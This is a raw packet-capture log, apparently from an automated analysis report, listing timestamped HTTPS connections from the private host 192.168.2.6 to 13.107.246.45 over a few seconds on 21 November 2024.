                                                                                                                                                                      Nov 21, 2024 06:24:25.450673103 CET49935443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:25.450680017 CET4434993513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:25.454694033 CET4434993413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:25.455332041 CET49934443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:25.455396891 CET4434993413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:25.455624104 CET49934443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:25.455640078 CET4434993413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:25.533539057 CET4434993113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:25.536753893 CET4434993113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:25.536807060 CET49931443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:25.536842108 CET49931443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:25.536859989 CET4434993113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:25.536873102 CET49931443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:25.536881924 CET4434993113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:25.539473057 CET49936443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:25.539490938 CET4434993613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:25.539568901 CET49936443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:25.539741993 CET49936443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:25.539752960 CET4434993613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:25.721362114 CET4434993213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:25.724395990 CET4434993213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:25.724457026 CET49932443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:25.724535942 CET49932443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:25.724565029 CET4434993213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:25.724581003 CET49932443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:25.724591017 CET4434993213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:25.728473902 CET49937443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:25.728559971 CET4434993713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:25.728658915 CET49937443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:25.728805065 CET49937443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:25.728823900 CET4434993713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:25.759548903 CET4434993313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:25.762434959 CET4434993313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:25.762499094 CET49933443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:25.762543917 CET49933443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:25.762558937 CET4434993313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:25.762569904 CET49933443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:25.762574911 CET4434993313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:25.764672995 CET49938443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:25.764695883 CET4434993813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:25.764764071 CET49938443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:25.764885902 CET49938443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:25.764898062 CET4434993813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:25.931746006 CET4434993413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:25.932773113 CET4434993513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:25.932873964 CET4434993513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:25.932934046 CET49935443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:25.932977915 CET49935443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:25.932998896 CET4434993513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:25.933010101 CET49935443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:25.933015108 CET4434993513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:25.934809923 CET4434993413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:25.934890032 CET49934443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:25.934946060 CET49934443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:25.934971094 CET4434993413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:25.934987068 CET49934443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:25.934995890 CET4434993413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:25.935636997 CET49939443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:25.935731888 CET4434993913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:25.935820103 CET49939443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:25.935951948 CET49939443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:25.935986996 CET4434993913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:25.937174082 CET49940443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:25.937195063 CET4434994013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:25.937258959 CET49940443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:25.937383890 CET49940443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:25.937393904 CET4434994013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:27.317027092 CET4434993613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:27.367367983 CET49936443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:27.412472010 CET49936443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:27.412513971 CET4434993613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:27.412957907 CET49936443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:27.412964106 CET4434993613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:27.511945009 CET4434993713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:27.512447119 CET49937443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:27.512517929 CET4434993713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:27.512932062 CET49937443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:27.512948990 CET4434993713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:27.545320988 CET4434993813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:27.545799017 CET49938443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:27.545830011 CET4434993813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:27.546536922 CET49938443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:27.546544075 CET4434993813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:27.715607882 CET4434993913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:27.716157913 CET49939443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:27.716198921 CET4434993913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:27.716646910 CET49939443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:27.716654062 CET4434993913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:27.763444901 CET4434993613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:27.766585112 CET4434993613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:27.766657114 CET49936443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:27.769087076 CET49936443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:27.769109964 CET4434993613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:27.769120932 CET49936443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:27.769126892 CET4434993613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:27.772844076 CET49941443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:27.772898912 CET4434994113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:27.772959948 CET49941443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:27.773132086 CET49941443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:27.773148060 CET4434994113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:27.781488895 CET4434994013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:27.781912088 CET49940443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:27.781933069 CET4434994013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:27.782432079 CET49940443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:27.782438040 CET4434994013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:27.953913927 CET4434993713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:27.957020998 CET4434993713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:27.957134008 CET49937443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:27.957225084 CET49937443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:27.957225084 CET49937443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:27.957273006 CET4434993713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:27.957300901 CET4434993713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:27.959795952 CET49942443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:27.959837914 CET4434994213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:27.960097075 CET49942443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:27.960279942 CET49942443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:27.960304022 CET4434994213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:27.989291906 CET4434993813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:27.992461920 CET4434993813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:27.992515087 CET4434993813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:27.992523909 CET49938443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:27.992559910 CET49938443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:27.992624998 CET49938443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:27.992639065 CET4434993813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:27.992647886 CET49938443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:27.992651939 CET4434993813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:27.994765997 CET49943443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:27.994865894 CET4434994313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:27.994942904 CET49943443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:27.995085001 CET49943443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:27.995115995 CET4434994313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:28.164297104 CET4434993913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:28.167421103 CET4434993913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:28.167500019 CET49939443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:28.167576075 CET49939443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:28.167576075 CET49939443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:28.167619944 CET4434993913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:28.167646885 CET4434993913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:28.170203924 CET49944443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:28.170257092 CET4434994413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:28.170324087 CET49944443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:28.170474052 CET49944443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:28.170491934 CET4434994413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:28.279027939 CET4434994013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:28.282176971 CET4434994013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:28.282250881 CET49940443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:28.282289982 CET49940443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:28.282304049 CET4434994013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:28.282341957 CET49940443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:28.282347918 CET4434994013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:28.284638882 CET49945443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:28.284723997 CET4434994513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:28.284806967 CET49945443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:28.284961939 CET49945443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:28.284991980 CET4434994513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:29.616148949 CET4434994113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:29.616728067 CET49941443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:29.616795063 CET4434994113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:29.617214918 CET49941443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:29.617237091 CET4434994113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:29.682708025 CET4434994213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:29.683152914 CET49942443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:29.683173895 CET4434994213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:29.683551073 CET49942443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:29.683556080 CET4434994213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:29.775060892 CET4434994313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:29.775569916 CET49943443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:29.775623083 CET4434994313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:29.775974989 CET49943443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:29.775989056 CET4434994313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:29.974194050 CET4434994413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:29.974672079 CET49944443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:29.974713087 CET4434994413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:29.975135088 CET49944443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:29.975147963 CET4434994413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.133486032 CET4434994113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.133553028 CET4434994113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.133635044 CET49941443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:30.133824110 CET49941443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:30.133872986 CET4434994113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.133904934 CET49941443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:30.133920908 CET4434994113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.136778116 CET49946443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:30.136857033 CET4434994613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.136949062 CET49946443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:30.137159109 CET49946443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:30.137191057 CET4434994613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.185287952 CET4434994213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.185343027 CET4434994213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.185435057 CET49942443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:30.185456038 CET4434994213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.185478926 CET4434994213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.185542107 CET49942443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:30.185678005 CET49942443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:30.185692072 CET4434994213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.185718060 CET49942443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:30.185724020 CET4434994213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.188649893 CET49947443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:30.188700914 CET4434994713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.188796043 CET49947443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:30.188966036 CET49947443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:30.188985109 CET4434994713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.254761934 CET4434994513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.255434990 CET49945443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:30.255496025 CET4434994513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.255950928 CET49945443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:30.255964994 CET4434994513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.274689913 CET4434994313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.274724960 CET4434994313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.274771929 CET4434994313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.274799109 CET49943443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:30.274869919 CET49943443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:30.275044918 CET49943443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:30.275105000 CET4434994313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.275141954 CET49943443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:30.275158882 CET4434994313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.278023958 CET49948443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:30.278064966 CET4434994813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.278153896 CET49948443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:30.278301954 CET49948443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:30.278317928 CET4434994813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.457509041 CET4434994413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.461062908 CET4434994413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.461131096 CET4434994413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.461144924 CET49944443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:30.461239100 CET49944443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:30.462533951 CET49944443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:30.462533951 CET49944443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:30.462580919 CET4434994413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.462608099 CET4434994413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.466553926 CET49949443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:30.466588974 CET4434994913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.466650963 CET49949443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:30.466794014 CET49949443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:30.466808081 CET4434994913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.707072020 CET4434994513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.710427999 CET4434994513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.710516930 CET49945443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:30.710627079 CET49945443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:30.710627079 CET49945443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:30.710670948 CET4434994513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.710695982 CET4434994513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.713059902 CET49950443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:30.713094950 CET4434995013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:30.713176012 CET49950443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:30.713325977 CET49950443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:30.713335991 CET4434995013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:31.909516096 CET4434994713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:31.954651117 CET49947443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:31.997812033 CET4434994613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:32.040771961 CET49946443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:32.121601105 CET4434994813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:32.138194084 CET49947443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:32.138253927 CET4434994713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:32.150132895 CET49947443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:32.150154114 CET4434994713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:32.154392958 CET49946443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:32.154412031 CET4434994613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:32.158735991 CET49946443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:32.158740997 CET4434994613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:32.165620089 CET49948443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:32.176213980 CET49948443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:32.176224947 CET4434994813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:32.176744938 CET49948443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:32.176753998 CET4434994813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:32.245495081 CET4434994913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:32.273613930 CET49949443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:32.273638964 CET4434994913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:32.274343014 CET49949443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:32.274348974 CET4434994913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:32.433825016 CET4434995013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:32.434427023 CET49950443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:32.434489012 CET4434995013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:32.435163021 CET49950443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:32.435170889 CET4434995013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:32.467511892 CET4434994713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:32.470537901 CET4434994713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:32.470629930 CET49947443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:32.470712900 CET49947443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:32.470712900 CET49947443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:32.470752954 CET4434994713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:32.470777035 CET4434994713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:32.474082947 CET49951443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:32.474122047 CET4434995113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:32.474191904 CET49951443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:32.474374056 CET49951443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:32.474396944 CET4434995113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:32.494579077 CET4434994613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:32.498305082 CET4434994613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:32.498356104 CET4434994613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:32.498362064 CET49946443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:32.498452902 CET49946443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:32.498475075 CET49946443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:32.498497963 CET4434994613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:32.498513937 CET49946443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:32.498519897 CET4434994613.107.246.45192.168.2.6
